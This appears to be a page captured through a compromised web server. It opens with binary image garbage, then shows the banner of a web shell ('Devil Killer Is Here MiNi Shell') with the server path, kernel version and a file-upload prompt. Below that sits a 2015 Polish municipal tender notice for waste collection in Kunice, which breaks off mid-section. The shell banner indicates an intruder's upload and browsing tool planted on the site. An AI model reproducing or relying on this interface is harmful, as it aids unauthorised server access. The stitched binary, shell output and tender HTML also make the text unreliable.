JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/308912-N-2015.html

<p class="kh_header"><b>Kunice: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kunice</b><br>
<b>Numer ogłoszenia: 308912 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Kunice , ul. Gwarna 1, 59-216 Kunice, woj. dolnośląskie, tel. 076 8575322, faks 076 8575482.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kunice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kunice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi odbioru i zagospodarowania odpadów komunalnych polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości zamieszkałych położonych na terenie gminy Kunice. Przedmiot zamówienia obejmuje także odbiór odpadów z pojemników do selektywnej zbiórki odpadów typu dzwon, kosz rozmieszczonych na terenie gminy Kunice.
Wykonawca ma za zadanie: przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami określoną w ustawie z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.), przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej instalacji do przetwarzania odpadów komunalnych, wyznaczonej dla Gminy Kunice w uchwale nr LIII 1966 14 Sejmiku Województwa Dolnośląskiego z dnia 25 września 2014r. w sprawie zmiany uchwały nr XXIV 617 12 Sejmiku Województwa Dolnośląskiego z dnia 27 czerwca 2012r. w sprawie wykonania Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Dolnośląskiego 2012 lub innej aktualnej. W celu osiągnięcia wymaganych prawem poziomów recyklingu wykonawca ma za zadanie także przekazywanie odebranych odpadów do ich termicznego przekształcenia w rozumieniu ustawy z 14 grudnia 2012r. odpadach (Dz.U. z 2013r., poz. 21 ze zm.).
Szczegółowe określenie zarówno przedmiotu jak i wielkości lub zakresu zamówienia jest zawarte w specyfikacji istotnych warunków zamówienia oraz w opisie przedmiotu zamówienia umieszczonych na stronie internetowej Zamawiającego.
Zamawiający przewiduje ilości odpadów, które będą musiały być odebrane od właścicieli nieruchomości zamieszkałych, w podziale na poszczególne grupy klasyfikacyjne, w ilościach zbliżonych do odebranych w odpowiednich okresach tj. roku 2014 oraz 2015.
Odpady odbierane z terenu Gminy Kunice zgodnie z uregulowaniami prawa miejscowego: FRAKCJA SUCHA: Papier, tektura (makulatura, karton), Metale, Tworzywa sztuczne, Opakowania wielomateriałowe. FRAKCJA MOKRA: Odpady ulegające biodegradacji (w tym odpady zielone). ODPADY ZMIESZANE: Odpady zmieszane niedające się wyselekcjonować (w tym popiół), POZOSTAŁE ODPADY KOMUNALNE: Szkło odbierane selektywnie w tzw. dzwonach, Zużyte baterie i akumulatory małogabarytowe, Zużyty sprzęt elektryczny i elektroniczny, Chemikalia, Zużyte opony od samochodów osobowych, Meble oraz inne odpady wielkogabarytowe, Odpady budowlane i rozbiórkowe pochodzące z drobnych remontów, Przeterminowane leki.
Odpady należy odbierać bezpośrednio z nieruchomości zamieszkałych, jako: frakcja sucha: z pojemników koloru żółtego, frakcja mokra: z pojemników koloru brązowego, odpady zmieszane (niesegregowane) z pojemników koloru czarnego, szarego, grafitowego, zielonego. Odpady w postaci szkła należy odbierać z pojemników do selektywnej zbiórki odpadów tzw. dzwonów rozmieszczonych na terenie Gminy Kunice. Lokalizacje ww. pojemników określa opis przedmiotu zamówienia. Bezpośrednio spod nieruchomości zamieszkałych podczas trwania zbiórki w systemie akcyjnym; katalog odpadów zbieranych w systemie zbiórki akcyjnej oraz limity ich przyjęcia przez Wykonawcę określa szczegółowo opis przedmiotu zamówienia.
W ramach zbiórek akcyjnych Wykonawca jest także zobowiązany do odbioru odzieży, lamp fluorescencyjnych i innych odpadów zawierających rtęć, zużytych urządzeń zawierających niebezpieczne elementy inne niż wymienione w 16 02 09 do 16 02 12.
Wykonawca w ramach zaoferowanej ceny, na czas trwania umowy, zobowiązany 
jest do zaopatrzenia właścicieli nieruchomości zamieszkałych w pojemniki na odpady 
o kolorystyce określonej w punkcie od 3.2.1 do 3.2.3 opisu przedmiotu zamówienia, 
o pojemnościach wskazanych w regulaminie utrzymania czystości i porządku na terenie gminy Kunice oraz utrzymania ich w należytym stanie sanitarnym, technicznym i porządkowym. Wykonawca dostarcza także specjalne pojemniki do gromadzenia przeterminowanych leków do aptek w Kunicach oraz Jaśkowicach Legnickich.
Szacunkowa średnio miesięczna liczba pojemników do gromadzenia odpadów komunalnych, które należy dostarczyć do nieruchomości zamieszkałych w zabudowie jednorodzinnej i wielorodzinnej: pojemniki koloru żółtego frakcja sucha, koloru brązowego frakcja mokra, koloru czarnego odpady zmieszane (niesegregowane), łącznie około 37-50 sztuk miesięcznie.
Wykonawca jest zobowiązany do dostarczenia we własnym zakresie, w miesiącach od 1 lipca do 30 sierpnia, odpowiednio 3 sztuk pojemników do segregacji zewnętrznej o pojemności minimum 1,5m3 na opakowania z plastiku, 3 sztuk pojemników do segregacji zewnętrznej o pojemności minimum 1,5m3 na szkło, na teren zbiornika wodnego w miejscowości Spalona wraz z odbiorem i zagospodarowaniem odpadów w nich gromadzonych zgodnie z ustaloną hierarchią postępowania z odpadami.
Wykonawca jest zobowiązany przez cały okres trwania umowy do utrzymywania pojemników, na nieruchomości zamieszkałych oraz z tzw. gniazd rozmieszczonych 
na terenie Gminy Kunice, w odpowiednim stanie technicznym oraz sanitarnym poprzez systematyczne przeglądy ich stanu technicznego, konserwację, naprawę lub wymianę 
oraz ich mycie i dezynfekcję. Częstotliwość mycia i dezynfekcji pojemników ustala się na nie częściej niż raz na pół roku, w porozumieniu z Zamawiającym.
Przedmiotem zamówienia jest także usługa polegająca na odbiorze i zagospodarowaniu odpadów z koszy ulicznych znajdujących się na terenie Gminy Kunice oraz z pojemników znajdujących się na terenie cmentarza w Rosochatej.
Zamówienie dotyczące opróżniania koszy ulicznych dotyczy obszaru wsi Kunice i obejmuje 51 lokalizacje w zwartej zabudowie. Kosze uliczne oraz pojemniki z cmentarza w Rosochatej, należy opróżniać przy okazji odbioru odpadów komunalnych z nieruchomości zamieszkałych w danej miejscowości z tą samą częstotliwością.
Zamówienie dotyczące odbioru i zagospodarowania odpadów komunalnych z terenu cmentarza w Rosochatej obejmuje dostarczenie 2 sztuk pojemników o pojemności 1100l oraz odbiór i zagospodarowanie odpadów pochodzących z cmentarza. Dodatkowo na zlecenie Zamawiającego, Wykonawca podstawia kontener o pojemności wyznaczonej przez Zamawiającego oraz odbiera i zagospodarowuje odpady w nim zgromadzone z cmentarza w Rosochatej. Przewiduje się konieczność podstawienia jednego kontenera KP7 w miesiącu październiku oraz trzech w listopadzie.
Wymagane częstotliwości odbioru odpadów: frakcja sucha: odbiór co dwa tygodnie,
frakcja mokra: odbiór co dwa tygodnie od 1 kwietnia do 31 października oraz raz w miesiącu od 1 listopada do 31 marca, odpady zmieszane (niesegregowane): odbiór cotygodniowy w Ziemnicach, Grzybianach, Kunicach oraz osiedle budynków wielolokalowych w Rosochatej oraz co dwa tygodnie w Miłogostowicach, Pątnowie Legnickim, Bieniowicach, Szczytnikach nad Kaczawą, Szczytnikach Małych, Spalonej, 
Golance Górnej, Jaśkowicach Legnickich, Rosochatej, Piotrówku.
Przeterminowane leki należy odbierać z dwóch aptek, położonych w miejscowości Jaśkowice Legnickie oraz Kunice, raz na dwa miesiące. Należy także dokonywać odbiorów interwencyjnych w przypadku wcześniejszego przepełnienia, po zgłoszeniu Zamawiającego.
Dni tygodnia wyznaczone do odbioru odpadów o kodzie 200301: Poniedziałek: Miłogostowice, Pątnów Legnicki, Bieniowice, Szczytniki nad Kaczawą, Wtorek: Szczytniki Małe, Spalona, Golanka Górna, Środa: Ziemnice, Grzybiany, Czwartek: Jaśkowice Legnickie, Rosochata, Piotrówek, Piątek: Kunice.
Dni tygodnia wyznaczone do odbioru odpadów o kodzie 150106: Poniedziałek: Ziemnice, Grzybiany, Rosochata, Piotrówek, Wtorek: Miłogostowice, Pątnów Legnicki,
Bieniowice, Szczytniki nad Kaczawą, Środa: Kunice, Szczytniki Małe, Spalona,
Golanka Górna, Jaśkowice Legnickie. 
W zakresie odpadów o kodzie 200201 Zamawiający pozostawia wybór dni odbioru według uznania, jednak zgodnie z częstotliwościami określonymi w tabeli numer 8 opisu przedmiotu zamówienia.
Wykonawca musi dysponować bazą magazynowo transportową, o lokalizacji oraz wyposażeniu zgodnym z właściwymi przepisami raz wymogami określonymi w opisie przedmiotu zamówienia.
Rodzaj oraz ilość pojazdów które mają być w dyspozycji Wykonawcy określa Specyfikacja istotnych warunków zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.40.00-4, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium w wysokości 20.000 zł. /słownie: dwadzieścia tysięcy złotych/.
W przypadku wnoszenia wadium w pieniądzu, wpłaty należy dokonać na rachunek bankowy bank spółdzielczy w Legnicy o/ kunice nr 43 8649 1028 2001 0000 0228 0005, z dopiskiem na przelewie: wadium - odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Kunice. Wadium musi obejmować okres związania ofertą 30 dni od daty ostatecznego terminu składania ofert. Wadium złożone w formie pieniądza musi znaleźć się na rachunku zamawiającego najpóźniej w terminie złożenia ofert. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, 
które w wyznaczonym terminie składania ofert znajduje się na wskazanym rachunku bankowym zamawiającego. Wadium wnoszone w formie innej niż pieniądz należy złożyć równocześnie z ofertą, ale w oddzielnej, opisanej kopercie. Opis winien zawierać: Nazwę i adres Wykonawcy, Wadium - przetarg nr GP.271.16.2015.KG
Wadium w formie gwarancji powinno być sporządzone zgodnie z obowiązującym prawem i winno zawierać: nazwę i siedzibę wykonawcy, nazwę i siedzibę zamawiającego, nazwę i siedzibę gwaranta, określenie wierzytelności, kwotę gwarancji, termin ważności gwarancji, zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne zobowiązanie Zamawiającego w przypadkach określonych w art. 46 ust.4a i 5 ustawy Prawo Zamówień Publicznych (Dz.U. z 2010r Nr 113 poz. 759)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie przedmiotowego zamówienia publicznego mogą ubiegać się Wykonawcy, 
którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 p.z.p., a w szczególności:posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W niniejszym postępowaniu wykonawca powinien: być wpisany do rejestru działalności regulowanej prowadzonej przez Wójta Gminy Kunice, o którym mowa w art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz. 1399 ze zm.), posiadać zezwolenie na transport odpadami wydane przez właściwy organ na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2013 r. nr 21 ze zm.) lub odpowiadające mu zezwolenie na transport odpadami wydane na podstawie wcześniej obowiązujących przepisów. Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia 
o spełnianiu warunków udziału w postępowaniu, posiadanego zezwolenia na transport odpadami, według formuły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem zweryfikowania zdolności Wykonawcy do należytego wykonania przedmiotu zamówienia w zakresie powyższego warunku, Zamawiający żąda od Wykonawcy wykazania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał lub wykonuje, co najmniej dwie usługi w zakresie odbierania odpadów komunalnych od nieruchomości zamieszkałych, w ilości nie mniejszej niż 1000 Mg każda, Wykonawca podaje przedmiot, daty wykonania i podmioty, na rzecz, których usługi zostały wykonane oraz załącza dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, wykazu głównych usług oraz dowodów czy zostały wykonane lub są wykonywane należycie, według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem zweryfikowania zdolności Wykonawcy do należytego wykonania przedmiotu zamówienia w zakresie powyższego warunku Zamawiający żąda od Wykonawcy wykazania, że dysponuje lub będzie dysponował: pojazdem typu śmieciarka o pojemności skrzyni załadowczej od 12 m3 do 18 m3, o dopuszczalnej masie całkowitej do 19 t co najmniej dwie sztuki, pojazdem z urządzeniem HDS do odbierania pojemników do selektywnej zbiórki odpadów tzw. dzwonów, o dopuszczalnej masie całkowitej do 19 t co najmniej jedna sztuka, pojazdem do odbioru kontenerów KP 5 do KP 12 o dopuszczalnej masie całkowitej do 19 t co najmniej jedna sztuka.
Ze względu na konieczność dojazdu do nieruchomości również przez wąskie, utwardzone drogi asfaltowe, brukowane i gruntowe, Zamawiający nie dopuszcza do wykorzystania podczas realizacji usługi pojazdów o większej masie całkowitej i większych gabarytach niż wyżej opisane.
Wszystkie pojazdy świadczące usługę na terenie Gminy Kunice, będą wyposażone w systemem monitoringu, bazującego na systemie pozycjonowania satelitarnego (GPS), umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu, miejscach postoju oraz czujniki zapisujące dane o miejscach załadunku i wyładunku odpadów, umożliwiające weryfikacje tych danych przez Zamawiającego; bazą magazynowo transportową usytuowaną w odległości nie większej niż 60 km od granic gminy Kunice oraz spełniającą warunki wskazane w odrębnych przepisach oraz opisie przedmiotu zamówienia. Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy i informacji o podstawie dysponowania tymi zasobami, według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zmawiający nie stawia wymogów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem zweryfikowania zdolności Wykonawcy do należytego wykonania przedmiotu zamówienia w zakresie powyższego warunku Zamawiający żąda od Wykonawcy wykazania, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00 zł (słownie: pięćset tysięcy złotych).
Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów i dowodów według formuły spełnia, nie spełnia. 
Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, że spełniania warunki udziału w przedmiotowym postępowaniu, o których mowa w art. 22 ust. 1 p.z.p oraz brak podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 p.z.p.
Zgodnie z art. 26 ust. 2b p.z.p. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących ich stosunków. Wykonawca w takiej sytuacji zobowiązany przedłożyć Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotu zamówienia (dysponowanie zasobami podmiotu trzeciego).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
